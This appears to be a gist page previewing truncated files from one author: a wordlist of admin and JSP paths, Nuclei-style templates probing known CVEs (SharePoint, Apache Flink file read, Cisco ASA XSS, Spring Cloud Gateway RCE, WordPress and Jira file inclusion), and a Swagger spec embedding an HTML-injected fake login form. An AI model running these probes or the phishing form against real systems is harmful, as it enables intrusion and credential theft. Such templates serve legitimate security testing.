This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /admin/admin.js | |
| /admin/appinfo.jsp | |
| /admin/cache_stats.jsp | |
| /admin/catalogcache.jsp | |
| /admin/ccms/customizing.jsp | |
| /admin/ccms/result.jsp | |
| /admin/ccms/sendFailure.jsp | |
| /ecall/jsp/customer/login/login.jsp | |
| /ecall/jsp/customer/upload/upload.jsp | |
| /user/admin/index.jsp |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| info: | |
| name: CVE-2020-0646 | |
| author: 0x240x23elu | |
| severity: High | |
| requests: | |
| - raw: | |
| - | | |
| POST /EN/_vti_bin/WebPartPages.asmx HTTP/1.1 | |
| Host: {{Hostname}} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2020-17519 | |
| info: | |
| name: Apache Flink Arbitrary file reading with JobManager | |
| author: 0x240x23elu & 0rich1 of Ant Security FG Lab | |
| severity: High | |
| requests: | |
| - method: GET | |
| path: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: wordpress-LFI | |
| info: | |
| name: wordpress-LFI | |
| author: 0x240x23elu | |
| severity: High | |
| requests: | |
| - method: GET | |
| path: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE_RCE2-1 | |
| info: | |
| name: CVE_RCE2 | |
| author: 0x240x23elu | |
| severity: high | |
| requests: | |
| - payloads: | |
| dirt: /mnt/d/tools/alltest/myopen/payload/PayloadsAllTheThings/DirectoryTraversal/Intruder/traversals-8-deep-exotic-encoding.txt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2020-3580 | |
| info: | |
| name: xss in cisco ASA | |
| author: 0x240x23elu | |
| severity: high | |
| description: xss in cisco ASA | |
| tags: cve,cve2020,cisco | |
| requests: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: spring-cloud | |
| info: | |
| name: spring-cloud Exposure | |
| author: 0x240x23elu | |
| severity: info | |
| tags: panel,spring-cloud | |
| requests: | |
| - method: GET |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2022-22947 | |
| info: | |
| name: CVE-2022-22947 | |
| author: 0x240x23elu | |
| severity: critical | |
| description: Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947) | |
| reference: | |
| - https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947 | |
| tags: cve,cve2022,rce,spring |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2023-26255 | |
| info: | |
| name: Stagil navigation for jira - Local File Inclusion | |
| author: 0x240x23elu | |
| severity: high | |
| description: Prior to version 2.0.52 of the “Stagil navigation for jira – Menù & Themes", the fileName parameter is vulnerable to a "Directory Traversal" that would allow an attacker to read files on the server knowing their path | |
| reference: | |
| - https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26255.md | |
| cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| version: 1.0.0 | |
| title: Fake Login Page | |
| description: '<div class="login-form"> | |
| <div class="heading"> | |
| <h1>HTML Injection : Fake Login</h1> | |
| </div> | |
| <div class="form-container"> | |
| <form action="https://example.com/login" method="post" class="form-signin"> |